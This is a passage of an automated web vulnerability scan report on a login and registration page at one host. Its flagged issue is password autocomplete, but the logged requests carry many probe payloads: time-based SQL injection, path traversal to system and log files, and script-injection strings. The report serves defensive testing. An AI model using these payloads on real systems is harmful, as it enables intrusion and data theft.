The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.126. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.127. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.128. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=*/netsparker(0x000047)%3B/* HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=*/netsparker(0x000047)%3b/*" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.129. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.130. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%3Cscript%3Ens(0x000038)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3Cscript%3Ens(0x000038)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.131. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.132. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=syscolumns+WHERE+2%3E3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.133. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%2Bresponse.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.134. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/version%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.135. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.136. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:35 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:35 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000002)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.137. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.138. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.139. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003A))%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%3c/a%20style=x:expre/**/ssion(netsparker(0x00003a))%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.140. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../windows/iis6.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.141. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.142. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../var/log/apache/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
